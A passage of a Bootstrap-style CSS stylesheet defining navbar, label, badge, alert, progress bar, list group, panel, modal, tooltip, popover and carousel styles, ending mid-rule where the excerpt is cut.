.navbar-inverse .navbar-brand:focus {
color: #fff;
background-color: transparent;
}
.navbar-inverse .navbar-text {
color: #999;
}
.navbar-inverse .navbar-nav > li > a {
color: #999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
color: #fff;
background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
color: #fff;
background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
color: #444;
background-color: transparent;
}
.navbar-inverse .navbar-toggle {
border-color: #333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
background-color: #333;
}
.navbar-inverse .navbar-toggle .icon-bar {
background-color: #fff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
color: #fff;
background-color: #080808;
}
@media (max-width: 767px) {
.navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
border-color: #080808;
}
.navbar-inverse .navbar-nav .open .dropdown-menu .divider {
background-color: #080808;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
color: #999;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
color: #fff;
background-color: transparent;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
color: #fff;
background-color: #080808;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
color: #444;
background-color: transparent;
}
}
.navbar-inverse .navbar-link {
color: #999;
}
.navbar-inverse .navbar-link:hover {
color: #fff;
}
.label {
display: inline;
padding: .2em .6em .3em;
font-size: 75%;
font-weight: bold;
line-height: 1;
color: #fff;
text-align: center;
white-space: nowrap;
vertical-align: baseline;
border-radius: .25em;
}
.label[href]:hover,
.label[href]:focus {
color: #fff;
text-decoration: none;
cursor: pointer;
}
.label:empty {
display: none;
}
.btn .label {
position: relative;
top: -1px;
}
.label-default {
background-color: #999;
}
.label-default[href]:hover,
.label-default[href]:focus {
background-color: #808080;
}
.label-primary {
background-color: #428bca;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
background-color: #3071a9;
}
.label-success {
background-color: #5cb85c;
}
.label-success[href]:hover,
.label-success[href]:focus {
background-color: #449d44;
}
.label-info {
background-color: #5bc0de;
}
.label-info[href]:hover,
.label-info[href]:focus {
background-color: #31b0d5;
}
.label-warning {
background-color: #f0ad4e;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
background-color: #ec971f;
}
.label-danger {
background-color: #d9534f;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
background-color: #c9302c;
}
.badge {
display: inline-block;
min-width: 10px;
padding: 3px 7px;
font-size: 12px;
font-weight: bold;
line-height: 1;
color: #fff;
text-align: center;
white-space: nowrap;
vertical-align: baseline;
background-color: #999;
border-radius: 10px;
}
.badge:empty {
display: none;
}
.btn .badge {
position: relative;
top: -1px;
}
.btn-xs .badge {
top: 0;
padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
color: #fff;
text-decoration: none;
cursor: pointer;
}
a.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
color: #428bca;
background-color: #fff;
}
.nav-pills > li > a > .badge {
margin-left: 3px;
}
.jumbotron {
padding: 30px;
margin-bottom: 30px;
color: inherit;
background-color: #eee;
}
.jumbotron h1,
.jumbotron .h1 {
color: inherit;
}
.jumbotron p {
margin-bottom: 15px;
font-size: 21px;
font-weight: 200;
}
.container .jumbotron {
border-radius: 6px;
}
.jumbotron .container {
max-width: 100%;
}
@media screen and (min-width: 768px) {
.jumbotron {
padding-top: 48px;
padding-bottom: 48px;
}
.container .jumbotron {
padding-right: 60px;
padding-left: 60px;
}
.jumbotron h1,
.jumbotron .h1 {
font-size: 63px;
}
}
.thumbnail {
display: block;
padding: 4px;
margin-bottom: 20px;
line-height: 1.428571429;
background-color: #fff;
border: 1px solid #ddd;
border-radius: 4px;
-webkit-transition: all .2s ease-in-out;
transition: all .2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
display: block;
max-width: 100%;
height: auto;
margin-right: auto;
margin-left: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
border-color: #428bca;
}
.thumbnail .caption {
padding: 9px;
color: #333;
}
.alert {
padding: 15px;
margin-bottom: 20px;
border: 1px solid transparent;
border-radius: 4px;
}
.alert h4 {
margin-top: 0;
color: inherit;
}
.alert .alert-link {
font-weight: bold;
}
.alert > p,
.alert > ul {
margin-bottom: 0;
}
.alert > p + p {
margin-top: 5px;
}
.alert-dismissable {
padding-right: 35px;
}
.alert-dismissable .close {
position: relative;
top: -2px;
right: -21px;
color: inherit;
}
.alert-success {
color: #3c763d;
background-color: #dff0d8;
border-color: #d6e9c6;
}
.alert-success hr {
border-top-color: #c9e2b3;
}
.alert-success .alert-link {
color: #2b542c;
}
.alert-info {
color: #31708f;
background-color: #d9edf7;
border-color: #bce8f1;
}
.alert-info hr {
border-top-color: #a6e1ec;
}
.alert-info .alert-link {
color: #245269;
}
.alert-warning {
color: #8a6d3b;
background-color: #fcf8e3;
border-color: #faebcc;
}
.alert-warning hr {
border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
color: #66512c;
}
.alert-danger {
color: #a94442;
background-color: #f2dede;
border-color: #ebccd1;
}
.alert-danger hr {
border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
color: #843534;
}
@-webkit-keyframes progress-bar-stripes {
from {
background-position: 40px 0;
}
to {
background-position: 0 0;
}
}
@keyframes progress-bar-stripes {
from {
background-position: 40px 0;
}
to {
background-position: 0 0;
}
}
.progress {
margin-bottom: 20px;
overflow: hidden;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1);
box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1);
}
.progress-bar {
float: left;
width: 0;
height: 100%;
font-size: 12px;
line-height: 20px;
color: #fff;
text-align: center;
background-color: #428bca;
-webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15);
box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15);
-webkit-transition: width .6s ease;
transition: width .6s ease;
}
.progress-striped .progress-bar {
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-size: 40px 40px;
}
.progress.active .progress-bar {
-webkit-animation: progress-bar-stripes 2s linear infinite;
animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
background-color: #5cb85c;
}
.progress-striped .progress-bar-success {
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
background-color: #5bc0de;
}
.progress-striped .progress-bar-info {
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
background-color: #f0ad4e;
}
.progress-striped .progress-bar-warning {
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
background-color: #d9534f;
}
.progress-striped .progress-bar-danger {
background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent);
}
.media,
.media-body {
overflow: hidden;
zoom: 1;
}
.media,
.media .media {
margin-top: 15px;
}
.media:first-child {
margin-top: 0;
}
.media-object {
display: block;
}
.media-heading {
margin: 0 0 5px;
}
.media > .pull-left {
margin-right: 10px;
}
.media > .pull-right {
margin-left: 10px;
}
.media-list {
padding-left: 0;
list-style: none;
}
.list-group {
padding-left: 0;
margin-bottom: 20px;
}
.list-group-item {
position: relative;
display: block;
padding: 10px 15px;
margin-bottom: -1px;
background-color: #fff;
border: 1px solid #ddd;
}
.list-group-item:first-child {
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
.list-group-item:last-child {
margin-bottom: 0;
border-bottom-right-radius: 4px;
border-bottom-left-radius: 4px;
}
.list-group-item > .badge {
float: right;
}
.list-group-item > .badge + .badge {
margin-right: 5px;
}
a.list-group-item {
color: #555;
}
a.list-group-item .list-group-item-heading {
color: #333;
}
a.list-group-item:hover,
a.list-group-item:focus {
text-decoration: none;
background-color: #f5f5f5;
}
a.list-group-item.active,
a.list-group-item.active:hover,
a.list-group-item.active:focus {
z-index: 2;
color: #fff;
background-color: #428bca;
border-color: #428bca;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
color: #e1edf7;
}
.list-group-item-success {
color: #3c763d;
background-color: #dff0d8;
}
a.list-group-item-success {
color: #3c763d;
}
a.list-group-item-success .list-group-item-heading {
color: inherit;
}
a.list-group-item-success:hover,
a.list-group-item-success:focus {
color: #3c763d;
background-color: #d0e9c6;
}
a.list-group-item-success.active,
a.list-group-item-success.active:hover,
a.list-group-item-success.active:focus {
color: #fff;
background-color: #3c763d;
border-color: #3c763d;
}
.list-group-item-info {
color: #31708f;
background-color: #d9edf7;
}
a.list-group-item-info {
color: #31708f;
}
a.list-group-item-info .list-group-item-heading {
color: inherit;
}
a.list-group-item-info:hover,
a.list-group-item-info:focus {
color: #31708f;
background-color: #c4e3f3;
}
a.list-group-item-info.active,
a.list-group-item-info.active:hover,
a.list-group-item-info.active:focus {
color: #fff;
background-color: #31708f;
border-color: #31708f;
}
.list-group-item-warning {
color: #8a6d3b;
background-color: #fcf8e3;
}
a.list-group-item-warning {
color: #8a6d3b;
}
a.list-group-item-warning .list-group-item-heading {
color: inherit;
}
a.list-group-item-warning:hover,
a.list-group-item-warning:focus {
color: #8a6d3b;
background-color: #faf2cc;
}
a.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus {
color: #fff;
background-color: #8a6d3b;
border-color: #8a6d3b;
}
.list-group-item-danger {
color: #a94442;
background-color: #f2dede;
}
a.list-group-item-danger {
color: #a94442;
}
a.list-group-item-danger .list-group-item-heading {
color: inherit;
}
a.list-group-item-danger:hover,
a.list-group-item-danger:focus {
color: #a94442;
background-color: #ebcccc;
}
a.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus {
color: #fff;
background-color: #a94442;
border-color: #a94442;
}
.list-group-item-heading {
margin-top: 0;
margin-bottom: 5px;
}
.list-group-item-text {
margin-bottom: 0;
line-height: 1.3;
}
.panel {
margin-bottom: 20px;
background-color: #fff;
border: 1px solid transparent;
border-radius: 4px;
-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .05);
box-shadow: 0 1px 1px rgba(0, 0, 0, .05);
}
.panel-body {
padding: 15px;
}
.panel > .list-group {
margin-bottom: 0;
}
.panel > .list-group .list-group-item {
border-width: 1px 0;
border-radius: 0;
}
.panel > .list-group .list-group-item:first-child {
border-top: 0;
}
.panel > .list-group .list-group-item:last-child {
border-bottom: 0;
}
.panel > .list-group:first-child .list-group-item:first-child {
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.panel > .list-group:last-child .list-group-item:last-child {
border-bottom-right-radius: 3px;
border-bottom-left-radius: 3px;
}
.panel-heading + .list-group .list-group-item:first-child {
border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table {
margin-bottom: 0;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
border-top-left-radius: 3px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
border-top-right-radius: 3px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
border-bottom-left-radius: 3px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
border-bottom-right-radius: 3px;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive {
border-top: 1px solid #ddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th,
.panel > .table-bordered > tfoot > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:first-child > th,
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > tfoot > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:first-child > td {
border-top: 0;
}
.panel > .table-bordered > thead > tr:last-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:last-child > th,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-bordered > thead > tr:last-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td {
border-bottom: 0;
}
.panel > .table-responsive {
margin-bottom: 0;
border: 0;
}
.panel-heading {
padding: 10px 15px;
border-bottom: 1px solid transparent;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.panel-heading > .dropdown .dropdown-toggle {
color: inherit;
}
.panel-title {
margin-top: 0;
margin-bottom: 0;
font-size: 16px;
color: inherit;
}
.panel-title > a {
color: inherit;
}
.panel-footer {
padding: 10px 15px;
background-color: #f5f5f5;
border-top: 1px solid #ddd;
border-bottom-right-radius: 3px;
border-bottom-left-radius: 3px;
}
.panel-group {
margin-bottom: 20px;
}
.panel-group .panel {
margin-bottom: 0;
overflow: hidden;
border-radius: 4px;
}
.panel-group .panel + .panel {
margin-top: 5px;
}
.panel-group .panel-heading {
border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse .panel-body {
border-top: 1px solid #ddd;
}
.panel-group .panel-footer {
border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
border-bottom: 1px solid #ddd;
}
.panel-default {
border-color: #ddd;
}
.panel-default > .panel-heading {
color: #333;
background-color: #f5f5f5;
border-color: #ddd;
}
.panel-default > .panel-heading + .panel-collapse .panel-body {
border-top-color: #ddd;
}
.panel-default > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #ddd;
}
.panel-primary {
border-color: #428bca;
}
.panel-primary > .panel-heading {
color: #fff;
background-color: #428bca;
border-color: #428bca;
}
.panel-primary > .panel-heading + .panel-collapse .panel-body {
border-top-color: #428bca;
}
.panel-primary > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #428bca;
}
.panel-success {
border-color: #d6e9c6;
}
.panel-success > .panel-heading {
color: #3c763d;
background-color: #dff0d8;
border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse .panel-body {
border-top-color: #d6e9c6;
}
.panel-success > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #d6e9c6;
}
.panel-info {
border-color: #bce8f1;
}
.panel-info > .panel-heading {
color: #31708f;
background-color: #d9edf7;
border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse .panel-body {
border-top-color: #bce8f1;
}
.panel-info > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #bce8f1;
}
.panel-warning {
border-color: #faebcc;
}
.panel-warning > .panel-heading {
color: #8a6d3b;
background-color: #fcf8e3;
border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse .panel-body {
border-top-color: #faebcc;
}
.panel-warning > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #faebcc;
}
.panel-danger {
border-color: #ebccd1;
}
.panel-danger > .panel-heading {
color: #a94442;
background-color: #f2dede;
border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse .panel-body {
border-top-color: #ebccd1;
}
.panel-danger > .panel-footer + .panel-collapse .panel-body {
border-bottom-color: #ebccd1;
}
.well {
min-height: 20px;
padding: 19px;
margin-bottom: 20px;
background-color: #f5f5f5;
border: 1px solid #e3e3e3;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05);
box-shadow: inset 0 1px 1px rgba(0, 0, 0, .05);
}
.well blockquote {
border-color: #ddd;
border-color: rgba(0, 0, 0, .15);
}
.well-lg {
padding: 24px;
border-radius: 6px;
}
.well-sm {
padding: 9px;
border-radius: 3px;
}
.close {
float: right;
font-size: 21px;
font-weight: bold;
line-height: 1;
color: #000;
text-shadow: 0 1px 0 #fff;
filter: alpha(opacity=20);
opacity: .2;
}
.close:hover,
.close:focus {
color: #000;
text-decoration: none;
cursor: pointer;
filter: alpha(opacity=50);
opacity: .5;
}
button.close {
-webkit-appearance: none;
padding: 0;
cursor: pointer;
background: transparent;
border: 0;
}
.modal-open {
overflow: hidden;
}
.modal {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 1050;
display: none;
overflow: auto;
overflow-y: scroll;
-webkit-overflow-scrolling: touch;
outline: 0;
}
.modal.fade .modal-dialog {
-webkit-transition: -webkit-transform .3s ease-out;
-moz-transition: -moz-transform .3s ease-out;
-o-transition: -o-transform .3s ease-out;
transition: transform .3s ease-out;
-webkit-transform: translate(0, -25%);
-ms-transform: translate(0, -25%);
transform: translate(0, -25%);
}
.modal.in .modal-dialog {
-webkit-transform: translate(0, 0);
-ms-transform: translate(0, 0);
transform: translate(0, 0);
}
.modal-dialog {
position: relative;
width: auto;
margin: 10px;
}
.modal-content {
position: relative;
background-color: #fff;
background-clip: padding-box;
border: 1px solid #999;
border: 1px solid rgba(0, 0, 0, .2);
border-radius: 6px;
outline: none;
-webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, .5);
box-shadow: 0 3px 9px rgba(0, 0, 0, .5);
}
.modal-backdrop {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 1040;
background-color: #000;
}
.modal-backdrop.fade {
filter: alpha(opacity=0);
opacity: 0;
}
.modal-backdrop.in {
filter: alpha(opacity=50);
opacity: .5;
}
.modal-header {
min-height: 16.428571429px;
padding: 15px;
border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
margin-top: -2px;
}
.modal-title {
margin: 0;
line-height: 1.428571429;
}
.modal-body {
position: relative;
padding: 20px;
}
.modal-footer {
padding: 19px 20px 20px;
margin-top: 15px;
text-align: right;
border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
margin-bottom: 0;
margin-left: 5px;
}
.modal-footer .btn-group .btn + .btn {
margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
margin-left: 0;
}
@media (min-width: 768px) {
.modal-dialog {
width: 600px;
margin: 30px auto;
}
.modal-content {
-webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, .5);
box-shadow: 0 5px 15px rgba(0, 0, 0, .5);
}
.modal-sm {
width: 300px;
}
.modal-lg {
width: 900px;
}
}
.tooltip {
position: absolute;
z-index: 1030;
display: block;
font-size: 12px;
line-height: 1.4;
visibility: visible;
filter: alpha(opacity=0);
opacity: 0;
}
.tooltip.in {
filter: alpha(opacity=90);
opacity: .9;
}
.tooltip.top {
padding: 5px 0;
margin-top: -3px;
}
.tooltip.right {
padding: 0 5px;
margin-left: 3px;
}
.tooltip.bottom {
padding: 5px 0;
margin-top: 3px;
}
.tooltip.left {
padding: 0 5px;
margin-left: -3px;
}
.tooltip-inner {
max-width: 200px;
padding: 3px 8px;
color: #fff;
text-align: center;
text-decoration: none;
background-color: #000;
border-radius: 4px;
}
.tooltip-arrow {
position: absolute;
width: 0;
height: 0;
border-color: transparent;
border-style: solid;
}
.tooltip.top .tooltip-arrow {
bottom: 0;
left: 50%;
margin-left: -5px;
border-width: 5px 5px 0;
border-top-color: #000;
}
.tooltip.top-left .tooltip-arrow {
bottom: 0;
left: 5px;
border-width: 5px 5px 0;
border-top-color: #000;
}
.tooltip.top-right .tooltip-arrow {
right: 5px;
bottom: 0;
border-width: 5px 5px 0;
border-top-color: #000;
}
.tooltip.right .tooltip-arrow {
top: 50%;
left: 0;
margin-top: -5px;
border-width: 5px 5px 5px 0;
border-right-color: #000;
}
.tooltip.left .tooltip-arrow {
top: 50%;
right: 0;
margin-top: -5px;
border-width: 5px 0 5px 5px;
border-left-color: #000;
}
.tooltip.bottom .tooltip-arrow {
top: 0;
left: 50%;
margin-left: -5px;
border-width: 0 5px 5px;
border-bottom-color: #000;
}
.tooltip.bottom-left .tooltip-arrow {
top: 0;
left: 5px;
border-width: 0 5px 5px;
border-bottom-color: #000;
}
.tooltip.bottom-right .tooltip-arrow {
top: 0;
right: 5px;
border-width: 0 5px 5px;
border-bottom-color: #000;
}
.popover {
position: absolute;
top: 0;
left: 0;
z-index: 1010;
display: none;
max-width: 276px;
padding: 1px;
text-align: left;
white-space: normal;
background-color: #fff;
background-clip: padding-box;
border: 1px solid #ccc;
border: 1px solid rgba(0, 0, 0, .2);
border-radius: 6px;
-webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
box-shadow: 0 5px 10px rgba(0, 0, 0, .2);
}
.popover.top {
margin-top: -10px;
}
.popover.right {
margin-left: 10px;
}
.popover.bottom {
margin-top: 10px;
}
.popover.left {
margin-left: -10px;
}
.popover-title {
padding: 8px 14px;
margin: 0;
font-size: 14px;
font-weight: normal;
line-height: 18px;
background-color: #f7f7f7;
border-bottom: 1px solid #ebebeb;
border-radius: 5px 5px 0 0;
}
.popover-content {
padding: 9px 14px;
}
.popover .arrow,
.popover .arrow:after {
position: absolute;
display: block;
width: 0;
height: 0;
border-color: transparent;
border-style: solid;
}
.popover .arrow {
border-width: 11px;
}
.popover .arrow:after {
content: "";
border-width: 10px;
}
.popover.top .arrow {
bottom: -11px;
left: 50%;
margin-left: -11px;
border-top-color: #999;
border-top-color: rgba(0, 0, 0, .25);
border-bottom-width: 0;
}
.popover.top .arrow:after {
bottom: 1px;
margin-left: -10px;
content: " ";
border-top-color: #fff;
border-bottom-width: 0;
}
.popover.right .arrow {
top: 50%;
left: -11px;
margin-top: -11px;
border-right-color: #999;
border-right-color: rgba(0, 0, 0, .25);
border-left-width: 0;
}
.popover.right .arrow:after {
bottom: -10px;
left: 1px;
content: " ";
border-right-color: #fff;
border-left-width: 0;
}
.popover.bottom .arrow {
top: -11px;
left: 50%;
margin-left: -11px;
border-top-width: 0;
border-bottom-color: #999;
border-bottom-color: rgba(0, 0, 0, .25);
}
.popover.bottom .arrow:after {
top: 1px;
margin-left: -10px;
content: " ";
border-top-width: 0;
border-bottom-color: #fff;
}
.popover.left .arrow {
top: 50%;
right: -11px;
margin-top: -11px;
border-right-width: 0;
border-left-color: #999;
border-left-color: rgba(0, 0, 0, .25);
}
.popover.left .arrow:after {
right: 1px;
bottom: -10px;
content: " ";
border-right-width: 0;
border-left-color: #fff;
}
.carousel {
position: relative;
}
.carousel-inner {
position: relative;
width: 100%;
overflow: hidden;
}
.carousel-inner > .item {
position: relative;
display: none;
-webkit-transition: .6s ease-in-out left;
transition: .6s ease-in-out left;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
display: block;
max-width: 100%;
height: auto;
line-height: 1;
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
display: block;
}
.carousel-inner > .active {
left: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
position: absolute;
top: 0;
width: 100%;
}
.carousel-inner > .next {
left: 100%;
}
.carousel-inner > .prev {
left: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
left: 0;
}
.carousel-inner > .active.left {
left: -100%;
}
.carousel-inner > .active.right {
left: 100%;
}
.carousel-control {
position: absolute;
top: 0;
bottom: 0;
left: 0;
width: 15%;
font-size: 20px;
color: #fff;
text-align: center;
